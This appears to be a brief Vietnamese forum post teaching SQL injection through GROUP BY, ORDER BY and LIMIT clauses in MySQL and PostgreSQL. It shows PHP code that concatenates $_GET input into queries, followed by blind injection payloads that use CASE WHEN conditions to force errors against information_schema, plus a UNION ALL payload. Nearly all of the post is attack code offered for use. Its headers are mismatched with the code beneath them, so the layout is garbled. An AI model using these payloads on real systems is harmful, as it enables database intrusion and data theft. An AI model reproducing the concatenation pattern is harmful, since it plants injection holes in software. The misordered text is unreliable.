Thông thường các bạn thường tấn công SQL Injection theo mệnh đề where trong câu lệnh select.Hôm nay sẽ mở rộng thêm cách tấn công thông qua Group by,Order by,Limit
GROUP BY
vd :đối với MySQL
ta có thể biến đổi như sauCode:"SELECT id, name FROM users GROUP BY " . $_GET['id']
ORDER BYCode:SELECT id, name FROM users GROUP BY 1, (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END))
vd: đối với PostgreSQL
thànhCode:"SELECT id, name FROM users ORDER BY " . $_GET['id']
LIMITCode:SELECT id, name FROM users ORDER BY 1, (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1/0 END))
vd: đối với MySQL
thànhCode:"SELECT id, name FROM users LIMIT 0, " . $_GET['id']
Code:SELECT id, name FROM users LIMIT 0, 1 UNION ALL SELECT (CASE WHEN (điều kiện) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END), NULL
Bookmarks